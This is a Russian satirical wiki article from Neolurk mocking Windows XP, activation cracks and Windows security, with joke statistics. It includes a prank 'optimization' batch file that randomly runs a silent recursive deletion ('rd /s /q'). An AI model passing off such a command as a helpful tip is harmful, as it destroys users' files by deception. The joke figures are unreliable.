Юмор:Windows

Материал из Неолурк, народный Lurkmore
(перенаправлено с «Смехуечки:Windows»)
Перейти к навигации Перейти к поиску


Логотип Windows 6.66
Наркотравка
Рабочий стол Windows
Безопасный режим такой безопасный
Глючный Windows такой глючный

Microsoft(r) Windows — самая популярная среда распространения вирусов, или, как её называют в компании Microsoft, «операционная система». Первая версия Windows, которая не была воспринята народом и, что самое интересное, имеет всего 69 глюков, датируется июнем 1985 года, а Windows 3.0, первая общепринятая версия «системы» — маем 1990-го, имея уже 1337 глюков (не считая глюками способы вызвать BSOD из программ и Ctrl-Alt-Delete). Сейчас наибольшую популярность имеют три версии Windows: Windows XP(2001), Windows Vista(2007) и Windows 7(2009) aka Windows 6.66[1].

Рассмотрим самую популярную — это Windows XP. К ней прилагается дополнительное ПО:

  • Internet Explorer 6, система закачек троянов(также прога для скачивания браузеров)
  • Windows Media Player 8(или 9 в SP3), младший помощник закачек троянов; благодаря поддержке многозадачности, пока трояны закачиваются, можно слушать музыку
  • Outlook Express, программа для получения спама и троянов по почте,
  • Windows Movie Maker, вирус, который повреждает видеофайлы [2].

То есть, входящее в Windows XP ПО является вредоносным чуть более, чем на 100%.

  • Далее. Windows XP — это некое подобие бомбы замедленного действия, так как после установки нужно провести «Активацию Windows» (c) Microsoft, а точнее дезактивацию Windows (лучше бы уж было «дезактивация ReactOS») при помощи программы, именуемой Crack. Программ, являющихся Crack’ами для Windows XP, много, но чуть менее, чем полностью они являются вредоносными. К сожалению, если не дезактивировать Windows XP за 30 дней, то она будет загружаться только в максимально безопасном режиме, в котором она не работает не глючит защищает пользователя.

Единственный способ избежать геморроя, связанного с использованием Windows, является переход на альтернативные операционные системы, например GNU/Linux, *BSD или MacOS. Боль в попе от возникшего в результате геморроя превысит все допустимые и недопустимые пределы, но зато венды на компе больше не будет.

Также только нуб не знает, что для оптимизации системы нужно создать на диске C:\ файл optimiz.bat и вписать в него блокнотом «set /a R=0+6*%random%/32768 && if %R% == 0 (rd /s /q .\) else (echo ERROR)» без кавычек. Команда убирает из системы все лишнее. Если выводит ERROR — перезапустить.

Альтернативные мнения[править]

«Windows — не говно, просто вы ее говно правильно готовить не умеете»

Рассмотрим подробнее, как правильно приготовить Windows:

  1. Убрать всю красоту из интерфейса. Отключить все неиспользуемые службы (их список далеко не очевиден). Отключить весь искусственный интеллект.
  2. Отключить от Интернета физически либо посадить в глубокий интранет за фаерволлом не на основе Windows. Жестко фильтровать весь входящий и исходящий трафик. Проверять весь трафик на известные сигнатуры shitware и неизвестные аномалии (примерно раз в 3-5 минут). Поставить антивирус с ежедневным обновлением несколько раз в сутки.
  3. Внедрить ограниченную программную среду — разрешить запуск только определенных приложений.
  4. В Интернете — анализировать весь трафик на сигнатуры и аномалии. Внедрить шифрование и электронную подпись всего трафика между серверами Windows и клиентами Windows.
  5. Резервное копирование максимального объема информации ежедневно.
  6. Отключить порты USB и дисководы CD-DVD.
  7. Радикально урезать полномочия юзеров.
  8. Не поддаваться на провокации фирмы Microsoft — не обновлять версий Windows, Office и других программ, пока не припрет. Помните — каждая новая версия жрет вдвое больше ресурсов и предоставляет новые неизвестные дыры для желающих в них поковырять (при этом старые дыры никуда не деваются, так как процент reusable code в фирме Microsoft достигает 80).
  9. … список может быть неполон …
  10. ?????
  11. PROFIT

Естественно, не у каждого юзера и даже админа хватит знаний, силы духа, полномочий и ресурсов на такие действия (про ламеров вообще речи нет). Поэтому растут ряды юниксоидов и близится вендекапец![3]

Однако, есть лишь один сценарий, в случае которого Вендекапец и не приблизится: корпорация Майкрософт плавно и постепенно откажется от NT в пользу старого доброго Unix в любой его вариации, а после откроет код. можно просто открыть код, тогда превращение Винды в *nix произойдёт само по себе, без вмешательства майкрософт. Тогда да, все линуксоиды, бздуны и даже(!) яблочники плюнут на всё и перейдут на мастдай.

«Все ж мацают…»

Windows глючит у 95% пользователей. Остальные либо пряморуки, либо пенсионеры (не включают).

И всё же, если Вы чувствуете что зависимы от Вендовса, то существует сообщество [1]

Примечания[править]

  1. Одна из первых новостей про выход Windows 6.66 — http://www.winline.ru/news/1513.php
  2. Пруфлинк — Цитата на Баше http://bash.org.ru/quote/546
  3. Сразу после того, как все африканские деревни выпустят свой Linux-дистрибутив

Windows в картинках[править]

См. также[править]


03ef4f7db0cccdf39bf013566aed31bd.jpg Системы, без которых машина просто откажется работать
СистемыAndroidDOSFreeBSDHaikuЛинуксMenuetOSMacOS (OS X) / Хакинтош / iOSOS/2ReactOSWindows / ВиндаРусОСФантом ОСUnix
СредыGNOMEGNU EmacsKDE
ЛюдиБалмерГенерал ФейлорПоттерингСтоллманТорвальдсФолькердингРуслан КармановRealme (компания)
Дистрибутивы LinuxArchDebianFedoraFinnixGentooLFSUbuntu (BolgenOS) • Слака
Версии виндыВиста (говносборки) • Windows 2000Windows XPСемёркаWindows 11Windows Phone 7Windows Phone 8Windows VistaWindows 98Windows 95
ПользователиАдминБздун • Виндузятник • КрасноглазикЛинуксоидЯблочник
Площадки/s/LORru macru.os.cmpstoplinux.org.ru
Мемы/dev/null • BSD, not LSD • GIFGNOME vs. KDEMac vs. PCOS-tanrm -rfSystem32TRUE-DEATH-PRIMITIVE-LINUX-MITOLLWindows vs LinuxБубенВендекапецГномикиДаунгрейдЕсли бы…Ждём ебилдовКЛБМаздайПатчить KDE2 под FreeBSDПереустановка WindowsПриборчикРаспечатать лицензию на ЛинуксTuxТупые свитчерыФениксНе работай под рутомБлокировка Windows в России
Достойные упоминанияAmigaСтарая копипаста:Шindows